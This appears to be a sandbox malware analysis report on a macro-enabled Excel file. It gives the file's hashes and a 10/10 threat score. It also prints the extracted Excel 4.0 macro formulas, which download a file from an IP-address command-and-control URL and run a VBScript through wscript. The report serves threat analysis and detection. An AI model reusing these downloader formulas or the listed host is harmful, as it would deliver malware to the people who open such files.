Overview

overview

10

Static

static

10

c2a42a3553...f.xlsm

windows7-x64

10

c2a42a3553...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    c2a42a3553c8daeecf184f1b13fb666f

  • Size

    6KB

  • MD5

    c2a42a3553c8daeecf184f1b13fb666f

  • SHA1

    d7787fb7e81892624db896791bd6e67242dec35d

  • SHA256

    0b4cffaada3036d4debee347acabe7878fdb9a64407465fc83ae8d935907b083

  • SHA512

    fd4e976001fe58ac184292e933432ca71812e284fbb1411b2b071872a11073d5bfa268c0b56cc8bace638163cf8c35fb4cb0f475058f77043e65cec94ebc174b

  • SSDEEP

    192:NDS4uSVsbrA2OmmfRW+8UhHFBFYuWYb98y2B6QbkJ+pe:NHuw6M2wcm1FYRYb98y2B6QYie

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • c2a42a3553c8daeecf184f1b13fb666f
    .xlsm office2007